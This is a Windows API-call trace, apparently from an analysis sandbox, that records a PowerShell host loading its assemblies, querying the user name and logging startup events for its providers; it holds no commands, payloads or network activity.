	[0148.393] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0148.394] SetErrorMode (uMode=0x1) returned 0x1
	[0148.394] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ccfb0 | out: lpFileInformation=0x1ccfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0148.394] SetErrorMode (uMode=0x1) returned 0x1
	[0148.394] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0148.394] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccc00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0148.394] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.394] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccb30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0148.394] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.395] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0148.395] SetErrorMode (uMode=0x1) returned 0x1
	[0148.395] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ccde0 | out: lpFileInformation=0x1ccde0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0148.396] SetErrorMode (uMode=0x1) returned 0x1
	[0148.396] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0148.396] SetErrorMode (uMode=0x1) returned 0x1
	[0148.396] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ccde0 | out: lpFileInformation=0x1ccde0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0148.396] SetErrorMode (uMode=0x1) returned 0x1
	[0148.396] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccc20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0148.396] SetErrorMode (uMode=0x1) returned 0x1
	[0148.396] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cce80 | out: lpFileInformation=0x1cce80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0148.396] SetErrorMode (uMode=0x1) returned 0x1
	[0148.397] CoTaskMemAlloc (cb=0x804) returned 0x1b7f7950
	[0148.397] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f7950, nSize=0x1cd288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd288) returned 0x1
	[0148.397] CoTaskMemFree (pv=0x1b7f7950) 
	[0148.397] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.397] GetUserNameW (in: lpBuffer=0x3e4db0, pcbBuffer=0x1cd2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd2c8) returned 1
	[0148.398] CoTaskMemFree (pv=0x3e4db0) 
	[0148.398] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f9c900*="FileSystem", lpRawData=0x2f9c690) returned 1
	[0148.399] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0148.399] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.400] CoTaskMemFree (pv=0x1b7da9c0) 
	[0148.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.401] CoTaskMemAlloc (cb=0x804) returned 0x1b7f7950
	[0148.402] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f7950, nSize=0x1cd288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd288) returned 0x1
	[0148.402] CoTaskMemFree (pv=0x1b7f7950) 
	[0148.402] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.402] GetUserNameW (in: lpBuffer=0x3e4db0, pcbBuffer=0x1cd2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd2c8) returned 1
	[0148.402] CoTaskMemFree (pv=0x3e4db0) 
	[0148.403] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fa2140*="Function", lpRawData=0x2fa1ed0) returned 1
	[0148.407] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0148.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.407] CoTaskMemFree (pv=0x1b7da9c0) 
	[0148.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.698] CoTaskMemAlloc (cb=0x804) returned 0x1b80ae70
	[0148.698] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b80ae70, nSize=0x1cd288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd288) returned 0x1
	[0148.698] CoTaskMemFree (pv=0x1b80ae70) 
	[0148.698] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.698] GetUserNameW (in: lpBuffer=0x3e4db0, pcbBuffer=0x1cd2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd2c8) returned 1
	[0148.699] CoTaskMemFree (pv=0x3e4db0) 
	[0148.699] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd43d0*="Registry", lpRawData=0x2fd4160) returned 1
	[0148.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.782] CoTaskMemAlloc (cb=0x804) returned 0x1b80ae70
	[0148.782] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b80ae70, nSize=0x1cd288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd288) returned 0x1
	[0148.782] CoTaskMemFree (pv=0x1b80ae70) 
	[0148.783] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.783] GetUserNameW (in: lpBuffer=0x3e4db0, pcbBuffer=0x1cd2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd2c8) returned 1
	[0148.783] CoTaskMemFree (pv=0x3e4db0) 
	[0148.783] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd97e8*="Variable", lpRawData=0x2fd9578) returned 1
	[0148.785] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0148.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.785] CoTaskMemFree (pv=0x1b7da9c0) 
	[0148.788] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0148.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.789] CoTaskMemFree (pv=0x1b7da9c0) 
	[0148.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0148.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0148.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0148.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0148.956] CoTaskMemAlloc (cb=0x804) returned 0x1b80ae70
	[0148.956] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b80ae70, nSize=0x1cd288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd288) returned 0x1
	[0148.956] CoTaskMemFree (pv=0x1b80ae70) 
	[0148.956] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.956] GetUserNameW (in: lpBuffer=0x3e4db0, pcbBuffer=0x1cd2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd2c8) returned 1
	[0148.957] CoTaskMemFree (pv=0x3e4db0) 
	[0148.957] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fed640*="Certificate", lpRawData=0x2fed3d0) returned 1
	[0149.053] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.054] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.059] GetLogicalDrives () returned 0x4
	[0149.059] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0149.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0149.061] CoTaskMemAlloc (cb=0x20e) returned 0x1b7c5520
	[0149.061] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7c5520 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0149.061] CoTaskMemFree (pv=0x1b7c5520) 
	[0149.063] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.064] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.064] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.064] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.086] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.086] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.088] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.088] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.089] SetErrorMode (uMode=0x1) returned 0x1
	[0149.089] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cced0 | out: lpFileInformation=0x1cced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0149.089] SetErrorMode (uMode=0x1) returned 0x1
	[0149.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.089] SetErrorMode (uMode=0x1) returned 0x1
	[0149.089] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cced0 | out: lpFileInformation=0x1cced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0149.090] SetErrorMode (uMode=0x1) returned 0x1
	[0149.189] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.189] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.197] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0149.197] SetErrorMode (uMode=0x1) returned 0x1
	[0149.197] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cce90 | out: lpFileInformation=0x1cce90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0149.197] SetErrorMode (uMode=0x1) returned 0x1
	[0149.197] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0149.198] SetErrorMode (uMode=0x1) returned 0x1
	[0149.198] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cce90 | out: lpFileInformation=0x1cce90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0149.198] SetErrorMode (uMode=0x1) returned 0x1
	[0149.198] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0149.198] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0149.198] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0149.198] SetErrorMode (uMode=0x1) returned 0x1
	[0149.199] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cce90 | out: lpFileInformation=0x1cce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0149.199] SetErrorMode (uMode=0x1) returned 0x1
	[0149.199] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0149.199] SetErrorMode (uMode=0x1) returned 0x1
	[0149.199] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cce90 | out: lpFileInformation=0x1cce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0149.199] SetErrorMode (uMode=0x1) returned 0x1
	[0149.199] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0149.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0149.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.200] SetErrorMode (uMode=0x1) returned 0x1
	[0149.200] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cce90 | out: lpFileInformation=0x1cce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0149.200] SetErrorMode (uMode=0x1) returned 0x1
	[0149.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.200] SetErrorMode (uMode=0x1) returned 0x1
	[0149.200] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cce90 | out: lpFileInformation=0x1cce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0149.200] SetErrorMode (uMode=0x1) returned 0x1
	[0149.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.201] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0149.201] SetErrorMode (uMode=0x1) returned 0x1
